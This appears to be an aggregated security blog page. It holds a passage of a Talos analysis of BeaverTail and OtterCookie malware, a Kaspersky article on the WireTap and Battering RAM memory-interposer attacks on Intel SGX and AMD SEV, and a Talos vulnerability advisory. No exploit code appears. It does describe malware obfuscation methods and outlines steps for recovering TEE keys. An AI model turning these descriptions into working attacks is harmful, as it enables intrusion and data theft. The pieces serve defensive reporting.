BeaverTail has been observed since at least May 2023, and originally was a relatively small downloader component, designed to be included with Node.js based Javascript applications. BeaverTail was also used in supply chain attacks affecting packages in the NPM package repository, which was extensively covered in the previous research and it is outside of the scope of this post.
From the beginning, BeaverTail supported Windows, Linux and macOS, taking advantage of the fact that Node.js applications can be run on different operating system platforms.
Figure 16. Early BeaverTail OS platform check.
The other major functionalities within BeaverTail are the download of InvisibleFerret Python stealer payload modules and installation of a remote access module, typically an AnyDesk client, which would allow the attacker to take over the control of the infected machine remotely. Information stealing and remote access have remained recurring BeaverTail operational techniques over time.
Soon after the initial samples were discovered in June 2023, BeaverTail started to use simple base64 encoding of strings and renaming of variables to make the detection and analysis more difficult. This also included a scheme used to encode the C2 URL as a shuffled string whose slices are base64 decoded individually and then concatenated in a correct order to generate the final URL.
Figure 17. C2 URL encoding scheme used from early BeaverTail variants until the present.
Although BeaverTail is typically written in Javascript, Talos has also discovered several Javascript C2 IP server addresses. These were shared with C++ compiled binary variants created with the help of the Qt framework.
Figure 18. Qt based BeaverTail setting a Qthread parameters.
From the early beginnings in mid-2023, to the last quarter of 2024. BeaverTail C2 URL patterns stabilized around the most commonly-used TCP ports 1224 and 1244, rather than the port 3306 used by early variants. It seems that the threat actors quickly realized that most Windows installations do not come with preinstalled Python interpreters as Linux distributions and macOS. To tackle this issue, they included code which installs a Python distribution, typically from the “/pdown” URL path, required to run Python InvisibleFerret modules. This TTP remains until today.
In terms of detection evasion, Famous Chollima are using several methods to obfuscate code, most frequently utilzing different configurations of the free Javascript tool Obfuscator.io which does make the analysis and especially detection of the malicious code more challenging.
In addition to obfuscating the Javascript code they also regularly use various modes of XOR-based obfuscation of downloaded modules. XORed Python InvisibleFerret modules start with a unique user based string assignment followed by a reversed base64 encoded string, which contains the final Python module’s code that can also be XORed for obfuscation.
Figure 19. A typical InvisibleFerret self-decoding Python module.
Thankfully, by using the combination of a deobfuscating tool and an LLM to rename the variables and base64 decode encoded strings it is possible to analyse new samples with relative ease. However, the operational tempo of groups attributed to Famous Chollima is high and the detection of completely new samples and code on VirusTotal remains unreliable, allowing threat actors enough time to successfully attack some victims.
BeaverTail, OtterCookie and InvisibleFerret functional overlaps
All additional modules present in OtterCookie code correspond well to the functionality that is traditionally associated with InvisibleFerret and its Python-based modules, as well as some parts of the BeaverTail code. This move of the functionality to Javascript may allow the threat actors to remove the reliance on Python code, eliminating the requirement for installation of full Python distributions on Windows.
Table 3. Functional similarities between Famous Chollima tools.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for freehere.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for freehere.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please
contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from theFirewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase onSnort.org.
Snort2 rules are available for this threat: 65336
The following Snort3 rules are also available to detect the threat: 301315, 65336
ClamAV detections are also available for this threat: Js.Infostealer.Ottercookie-10057842-0, Js.Malware.Ottercookie-10057860-0
IOCs
IOCs for this research can also be found at our GitHub repository here.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-10-16 10:06:392025-10-16 10:06:39BeaverTail and OtterCookie evolve with a new Javascript module
Modern server processors feature a trusted execution environment (TEE) for handling especially sensitive information. There are many TEE implementations, but two are most relevant to this discussion: Intel Software Guard eXtensions (SGX), and AMD Secure Encrypted Virtualization (SEV). Almost simultaneously, two separate teams of researchers — one in the U.S. and one in Europe — independently discovered very similar (though distinct) methods for exploiting these two implementations. Their goal was to gain access to encrypted data held in random access memory. The scientific papers detailing these results were published just days apart:
WireTap: Breaking Server SGX via DRAM Bus Interposition is the effort of U.S. researchers, which details a successful hack of the Intel Software Guard eXtensions (SGX) system. They achieved this by intercepting the data exchange between the processor and the DDR4 RAM module.
In Battering RAM, scientists from both Belgium and the UK also successfully compromise Intel SGX, as well as AMD’s comparable security system, SEV-SNP, by manipulating the data-transfer process between the processor and the DDR4 RAM module.
Hacking a TEE
Both the technologies mentioned — Intel SGX and AMD SEV — are designed to protect data even if the system processing it is completely compromised. Therefore, the researchers began with the premise that the attacker would have complete freedom of action: full access to both the server’s software and hardware, and the confidential data they seek residing, for instance, on a virtual machine running on that server.
In that scenario, certain limitations of both Intel SGX and AMD SEV become critical. One example is the use of deterministic encryption: an algorithm where a specific sequence of input data always produces the exact same sequence of encrypted output data. Since the attacker has full access to the software, they can input arbitrary data into the TEE. If the attacker also had access to the resulting encrypted information, comparing these two data sets would allow them to calculate the private key used. This, in turn, would enable them to decrypt other data encrypted by the same mechanism.
The challenge, however, is how to read the encrypted data. It resides in RAM, and only the processor has direct access to it. The theoretical malware only sees the original information before it gets encrypted in memory. This is the main challenge, which the researchers approached in different ways. One straightforward, head-on solution is hardware-level interception of the data being transmitted from the processor to the RAM module.
How does this work? The memory module is removed and then reinserted using an interposer, which is also connected to a specialized device: a logic analyzer. The logic analyzer intercepts the data streams traveling across all the data and address lines to the memory module. This is quite complex. A server typically has many memory modules, so the attacker must find a way to force the processor to write the target information specifically to the desired range. Next, the raw data captured by the logic analyzer must be reconstructed and analyzed.
But the problems don’t end there. Modern memory modules exchange data with the processor at tremendous speeds, performing billions of operations per second. Intercepting such a high-speed data flow requires high-end equipment. The hardware that was used to prove the feasibility of this type of attack in 2021 cost hundreds of thousands of dollars.
The features of WireTap
The U.S. researchers behind WireTap managed to slash the cost of their hack to just under a thousand dollars. Their setup for intercepting data from the DDR4 memory module looked like this:
Test system for intercepting the data exchange between the processor and the memory module Source
They spent half of the budget on an ancient, quarter-century-old logic analyzer, which they acquired through an online auction. The remainder covered the necessary connectors, and the interposer (the adapter into which the target memory module was inserted) was custom-soldered by the authors themselves. An obsolete setup like this could not possibly capture the data stream at its normal speed. However, the researchers made a key discovery: they could slow down the memory module’s operation. Instead of the standard DDR4 effective speeds of 1600–3200 megahertz, they managed to throttle the speed down to 1333 megahertz.
From there, the steps are… well, not really simple, but clear:
Ensure that the data from the target process was written to the hacked memory module and then intercept it, still encrypted at this stage.
Input a custom data set into Intel SGX for encryption.
Intercept the encrypted version of the known data, compare the known plaintext with the resulting ciphertext, and compute the encryption key.
Decrypt the previously captured data belonging to the target process.
In summary, WireTap work doesn’t fundamentally change our understanding of the inherent limitations of Intel SGX. It does however demonstrate that the attack can be made drastically cheaper.
The features of Battering RAM
Instead of the straightforward data-interception approach, the researchers from Belgium’s KU Leuven university and their UK colleagues sought a more subtle and elegant method to access encrypted information. But before we dive into the details, let’s look at the hardware component and compare it to the American team’s work:
The memory module interposer used in Battering RAMSource
In place of a tangle of wires and a bulky data analyzer, this setup features a simple board designed from scratch, into which the target memory module is inserted. The board is controlled by an inexpensive Raspberry Pi Pico microcomputer. The hardware budget is negligible: just 50 euros! Moreover, unlike the WireTap attack, Battering RAM can be conducted covertly; continuous physical access to the server isn’t needed. Once the modified memory module is installed, the required data can be stolen remotely.
What exactly does this board do? The researchers discovered that by grounding just two address lines (which dictate where information is written or read) at the right moment, they could create a data mirroring situation. This causes information to be written to memory cells that the attacker can access. The interposer board acts as a pair of simple switches controlled by the Raspberry Pi microcomputer. While manipulating contacts on live hardware typically leads to a system freeze or data corruption, the researchers achieved stable operation by disconnecting and reconnecting the address lines only at the precise moments required.
This method gave the authors the ability to select where their data was recorded. Crucially, this means they didn’t even need to compute the encryption key! They first captured the encrypted information from the target process. Next, they ran their own program within the same memory range and requested the TEE system to decrypt the previously captured information. This technique allowed them to hack not only Intel SGX but also AMD SEV. Furthermore, this control over data writing helped them circumvent AMD’s security extension called SEV-SNP. This extension, using Secure Nested Paging, was designed to protect the virtual machine from compromise by preventing data modification in memory. Circumventing SEV-SNP theoretically allows attackers not only to read encrypted data but also to inject malicious code into a compromised virtual machine.
The relevance of physical attacks on server infrastructure
It’s clear that while the practical application of such attacks is possible, they’re unlikely to be conducted in the wild. The value of the stolen data would need to be extremely high to justify hardware-level tampering. At least, this is the stance taken by both Intel and AMD regarding their security solutions: both chipmakers responded to the researchers by stating that physical attacks fall outside their security model. However, both the American and European research teams demonstrated that the cost of these attacks is not nearly as high as previously believed. This potentially expands the list of threat actors willing to utilize such complex vulnerabilities.
The proposed attacks do come with their own restrictions. As we already mentioned, the information theft was conducted on systems equipped with DDR4 standard memory modules. The newer DDR5 standard, finalized in 2020, has not yet been compromised, even for research purposes. This is due both to the revised architecture of the memory modules and their increased operating speeds. Nevertheless, it’s highly likely that researchers will eventually find vulnerabilities in DDR5 as well. And that’s a good thing: the declared security of TEE systems must be regularly subjected to independent audits. Otherwise, it could turn out at some point that a supposedly trusted protection system unexpectedly becomes completely useless.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-10-15 20:06:562025-10-15 20:06:56WireTap and Battering RAM: attacks on TEEs | Kaspersky official blog
Cisco Talos’ Vulnerability Discovery & Research team recently disclosed one vulnerability in the OpenPLC logic controller and four vulnerabilities in the Planet WGR-500 router.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets fromSnort.org, and our latest Vulnerability Advisories are always posted onTalos Intelligence’s website.
OpenPLC denial-of-service vulnerability
Discovered by a member of Cisco Talos.
OpenPLC is an open-source programmable logic controller intended to provide a low cost industrial solution for automation and research.
Talos researchers foundTALOS-2025-2223 (CVE-2025-53476), a denial-of-service vulnerability in the ModbusTCP server functionality of OpenPLC_v3. A specially crafted series of network connections can prevent the server from processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability.
Planet WGR-500 stack-based buffer overflow, OS command injection, format string vulnerabilities
Discovered by Francesco Benvenuto of Cisco Talos.
The Planet Networking & Communication WGR-500 is an industrial router designed for Internet of Things (IoT) networks, particularly industrial networks such as transportation, government buildings, and other public areas. Talos found four vulnerabilities in the router software.
TALOS-2025-2226 (CVE-2025-54399-CVE-2025-54402) includes multiple stack-based buffer overflow vulnerabilities in the formPingCmd functionality. A specially crafted series of HTTP requests can lead to stack-based buffer overflow.
TALOS-2025-2227 (CVE-2025-54403-CVE-2025-54404) includes multiple OS command injection vulnerabilities in the swctrl functionality. A specially crafted network request can lead to arbitrary command execution.
TALOS-2025-2228 (CVE-2025-48826) is a format string vulnerability in the formPingCmd functionality of Planet WGR-500. A specially crafted series of HTTP requests can lead to memory corruption.
TALOS-2025-2229 (CVE-2025-54405-CVE-2025-54406) includes multiple OS command injection vulnerabilities in the formPingCmd functionality. A specially crafted series of HTTP requests can lead to arbitrary command execution.